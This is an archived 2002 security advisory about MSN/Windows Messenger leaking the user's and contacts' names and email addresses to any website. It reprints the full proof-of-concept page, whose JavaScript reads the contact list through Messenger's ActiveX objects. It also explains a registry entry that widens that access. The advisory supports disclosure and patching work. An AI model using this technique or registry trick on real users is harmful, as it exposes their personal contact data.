26th Sep 2002 [SBWID-5062]
COMMAND
MSN (or Windows) Messenger contact list can be stolen by any website
SYSTEMS AFFECTED
MSN Messenger 4.6.0073 (latest at 02/02/2002) on Windows 2000 with IE 6.
Windows Messenger 4.6.0073 (latest at 02/02/2002) on Windows XP with IE 6.
Probably other versions and other platforms too.
PROBLEM
Richard Burton revealed :
MSN Messenger (and Windows Messenger on XP) can be used to obtain
personal information about a user from any website (in any domain).
Using JavaScript a user's display name can be obtained from Messenger,
as well as the display names of all their contacts. For users who have
a sensible and accurate display name this should be considered a
privacy issue. (Note: anyone who has not set a display name at all,
will reveal their email address instead.)
Using the same technique web sites hosted on certain domains
(microsoft.com, hotmail.com & hotmail.msn.com) can also access the
email address of the user (along with the email addresses of all their
contacts). This could be used by Microsoft to track users on their
sites, which many would consider to be a privacy issue.
In addition to the three domains mentioned above, additional domains
can be allowed access to the email addresses with a single registry
entry. This registry entry could be made by spyware/adware installed by
a user (sometimes unknowingly along with a piece of shareware). Once
there you have the potential to give your email address to any site
that requests it and places it in a cookie.
Technical
=========
Microsoft designed Messenger to allow functionality to be used in
webpages using JavaScript or VBScript. This includes the ability to
view the display name and email address of the user and their contacts.
In an attempt to protect users only a certain selection of sites can
use script to get email addresses, but all can get display names.
The list of domain suffixes that have full access to Messenger
functionality (email addresses & more?) can be found in the
registry in key
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\Suffixes".
Values "Suffix0", "Suffix1", etc. By default there are no entries in
the list, but they can be added. E.g. adding value Suffix0 = "test.com"
will give web sites in the test.com domain full access to Messenger
information.
Full domains do not have to be specified in the list, adding "com"
would allow all .com sites to have full access.
Although by default there are no entries in this list, three domains
(listed above) are hard coded into Messenger for the same purpose.
These allow Microsoft to make their sites (e.g. Hotmail) look nice by
integrating messenger features into them. The user cannot remove the
special status applied to these sites.
For a simple how-to, just look at the source of the demonstration page
given below.
[http://raburton.members.easyspace.com/msn/] :
<html>
<head>
<title>MSN Messenger Privacy</title>
<div id="divMsgrObject" style="display:none">
<object classid='clsid:F3A614DC-ABE0-11d2-A441-00C04F795683' codetype='application/x-oleobject' height='1' id='MsgrObj' width='1'>
</object>
<object classid='clsid:FB7199AB-79BF-11d2-8D94-0000F875C541' codetype='application/x-oleobject' height='1' id='MsgrApp' width='1'>
</object>
</div>
<script event="onload" for="window" language="javascript">
// some variables
var textlist = "";
var you = "";
var installed = true;
// check for messenger installed
try {
var xObj = new ActiveXObject("Messenger.MsgrObject");
if (xObj == null)
installed = false;
} catch (e) {
installed = false;
}
if (installed) {
if (isStateOnline(MsgrObj.LocalState)) {
// get contact list
var list = MsgrObj.List(0);
// get you!
you = MsgrObj.LocalFriendlyName + " (" + MsgrObj.LocalLogonName + ")";
// get your friends
for (i=0; i<list.Count; i++)
textlist = textlist + list.Item(i).FriendlyName + " (" + list.Item(i).EmailAddress + ")\n";
} else {
// must be offline
you = " - MSN Messenger is not connected. - ";
}
} else {
// not installed
you = " - MSN Messenger is not installed. - ";
}
// fill in the form
document.forms.details.you.value = you;
document.forms.details.friends.value = textlist;
</script>
</head>
<body onScroll='nyw2()' onLoad='nyw1()' onMove='nyw2()' onResize='nyw2()' >
<SCRIPT>
<!--
var nyw3=0;
var nyw4=62;
var nyw5=470;
var nyw6=12;
var nyw7=200;
var nyw8=0;
var nyw9=0;
var nyw0,nyw10;
var nyw11,nyw12,nyw13,nyw8,nyw14;
var nyw15,nyw16,nyw17=500;
function nyw1()
{
if(nyw8==1)
return true;
if(document.all)
{
nyw11=document.all("nyw18").style;
nyw12=document.all("nyw19").style;
nyw20=nyw4+nyw3+0;
nyw21=nyw5+nyw6+nyw3;
nyw22='visible';
nyw23='hidden';
}
else
{
nyw22='show';
nyw23='hide';
nyw11=document.nyw18;
nyw12=document.nyw19;
nyw20=nyw4+nyw3+15;
nyw21=nyw5+nyw6+nyw3+15;
}
if(nyw0=="00550240")
{
if(document.all)
{
nyw12.display='none';
nyw11.display='none';
}
return true;
}
if(document.all)
{
if(document.body.clientHeight<nyw7||document.body.clientWidth<nyw7)
return true;
}
else if(document.layers)
{
if(window.innerHeight<nyw7||window.innerWidth<nyw7)
return true;
}
nyw8=1;
nyw2();
nyw11.visibility=nyw22;
if(document.layers)
nyw24();
}
function nyw24()
{
if(pageXOffset!=nyw15||pageYOffset!=nyw16)
{
nyw15=pageXOffset;
nyw16=pageYOffset;
nyw2();
if(nyw17>=500)
{
nyw17=20;
setTimeout("checkTime=500",1000);
}
}
nyw10=setTimeout("nyw24()",nyw17);
}
function nyw2()
{
if(!nyw8)
return true;
if(document.all)
{
if(document.body.scrollHeight<document.body.clientHeight
||document.body.scrollTop<((document.body.scrollHeight-document.body.clientHeight)/2))
{
nyw11.top=document.body.scrollTop+document.body.clientHeight-nyw20;
nyw12.top=document.body.scrollTop+document.body.clientHeight-nyw20;
}
else
{
nyw11.top=document.body.scrollTop+nyw3;
nyw12.top=document.body.scrollTop+nyw3;
}
nyw11.left=document.body.scrollLeft+document.body.clientWidth-nyw21;
nyw12.left=document.body.scrollLeft+document.body.clientWidth-nyw21+nyw5;
}
else if(document.layers)
{
if(window.pageYOffset<((window.outerHeight-window.innerHeight)/2))
{
nyw11.top=window.pageYOffset+window.innerHeight-nyw20;
nyw12.top=window.pageYOffset+window.innerHeight-nyw20;
}
else
{
nyw11.top=window.pageYOffset+nyw3;
nyw12.top=window.pageYOffset+nyw3;
}
nyw11.left=window.pageXOffset+window.innerWidth-nyw21;
nyw12.left=window.pageXOffset+window.innerWidth-nyw21+nyw5;
}
}
function nyw25()
{
nyw9=1;
nyw12.visibility=nyw22;
nyw11.visibility=nyw23;
clearTimeout(nyw14);
}
function nyw26()
{
nyw9=0;
nyw12.visibility=nyw23;
nyw11.visibility=nyw22;
}
//-->
</SCRIPT>
<DIV ID="nyw19" STYLE="position: absolute; top: 0; left: 0; visibility: hidden; z-index: 2147483632;">
<table border=0 cellspacing=0 cellpadding=0 height=62 bgcolor="#EEEEEE">
<tr>
<td valign="top"><a href="" title="Click here to expand banner" onClick="nyw26(); return false;"><img src="http://banner.easyspace.com/left.gif" width=12 height=12 border=0></a></td>
</tr>
<tr>
<td valign="bottom"><a href="http://www.easyspace.com/" target="_blank"><img src="http://banner.easyspace.com/littlelogo.gif" border=0></a></td>
</tr>
</table>
</DIV>
<DIV ID="nyw18" STYLE="position: absolute; top: 0; left: 0; z-index: 2147483647; visibility: hidden">
<table border=0 cellspacing=0 cellpadding=0 height=62>
<tr>
<td rowspan=2 valign="top"><A TARGET="_new" HREF="http://www.easyspace.com"><IMG SRC="http://banner.easyspace.com/ESBIZ-468-6.gif?r=0.0380174302486864" width=468 height=60 border=0 ALT="Nothing personal. Just business."></A></td>
<td bgcolor="#EEEEEE" valign="top"><a href="" title="Click here to shrink banner" onClick="nyw25(); return false;"><img src="http://banner.easyspace.com/right.gif" width=12 height=12 border=0></a></td>
</tr>
<tr>
<td bgcolor="#EEEEEE" valign="bottom"><a href="http://www.easyspace.com/" target="_blank"><img src="http://banner.easyspace.com/littlelogo.gif" border=0></a></td>
</tr>
</table>
</DIV>
<h1>MSN Messenger Privacy</h1> <br>
If you are running MSN messenger (and have JavaScript enabled) you should see
your name displayed below, along with a list of all your contacts. <br>
Note: this has been tested on MSN Messenger (4.6.0073) for Win2k & Windows
Messenger (4.6.0073) for WinXP (all with IE 6).<br>
<br>
If this page was hosted on microsoft.com, hotmail.com or hotmail.msn.com you
would also see your email address and your contacts email addresses (instead of
"undefined"). <br>
<br>
This information could be placed in a cookie and next time you request an item
from the server (page, image, etc.), this information would be sent back to the
server, allowing Microsoft to know who you are and who your friends are. <br>
<br>
By default, everyone has access to your display name and those of your contacts,
but only Microsoft can get your email address this way. However third parties
could get access to the email addresses, by simply adding a single entry to your
registry. That would require a little more effort, but is easily done. <br>
e.g. Installing software which contains "spyware" or "adware" (such as Kazaa, Go!Zilla,
Direct Connect, etc.*), could easily add such an entry to your registry. After
that you could be sending your email address to them every time your computer
loads an advertising banner from their site. <br>
<br>
To demonstrate what this would look like from a Microsoft server, or to a third
party after placing a registry entry on your computer add the following to your
registry (<a href="suffix0.reg">or run this file</a>) and reload this page: <br>
In key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\Suffixes
(you may need to create the Suffixes key) <br>
Add String: "Suffix0", Value: "raburton.members.easyspace.com" <br>
Note: this value doesn't have to be a complete host name, adding just "com"
would open your contact list to any .com website. <br>
<form id="details">
You are:<br>
<input type="text" readonly value="" id="you" size="80">
<br>
<br>
Your friends are:<br>
<textarea readonly value="" id="friends" cols="80" rows="10">
</textarea>
</form>
Richard Antony Burton (<a href="mailto:[email protected]">[email protected]</a>)
- 02/02/2002
<br><br>
* spyware/adware info from <a href="http://spychecker.com">spychecker.com</a>
<br><br>
<!-- Start of TheCounter.com Code -->
<SCRIPT TYPE="text/javascript" LANGUAGE="javascript">
s="na";c="na";j="na";f=""+escape(document.referrer)
</SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="javascript1.2">
s=screen.width;v=navigator.appName
if (v != "Netscape") {c=screen.colorDepth}
else {c=screen.pixelDepth}
j=navigator.javaEnabled()
</SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="javascript">
function pr(n) {document.write(n,"\n");}
NS2Ch=0
if (navigator.appName == "Netscape" &&
navigator.appVersion.charAt(0) == "2") {NS2Ch=1}
if (NS2Ch == 0) {
r="&size="+s+"&colors="+c+"&referer="+f+"&java="+j+""
pr("<A HREF=\"http://www.TheCounter.com\" TARGET=\"_top\"><IMG"+
" BORDER=0 SRC=\"http://c2.thecounter.com/id=1045755"+r+"\"><\/A>")}
</SCRIPT>
<NOSCRIPT><A HREF="http://www.TheCounter.com" TARGET="_top"><IMG
SRC="http://c2.thecounter.com/id=1045755" ALT="TC" BORDER=0></A>
</NOSCRIPT>
<!-- End of TheCounter.com Code -->
</body>
<script language="javascript">
// is user online?
function isStateOnline(state) {
var ret;
switch (state) {
case 2:
//online
case 6:
//invisible
case 10:
//busy
case 14:
//be right back
case 18:
//idle
case 34:
//away
case 50:
//on the phone
case 66:
//out to lunch
ret = true;
break;
default:
ret = false;
break;
}
return ret;
}
</script>
</html>
SOLUTION
At this time, the only way for a user to prevent sites having any
access to their information is by logging out of Messenger before
visiting.
Update (14 February 2002)
======
Get patch 4.6.0076 from :
http://messenger.microsoft.com/Default.asp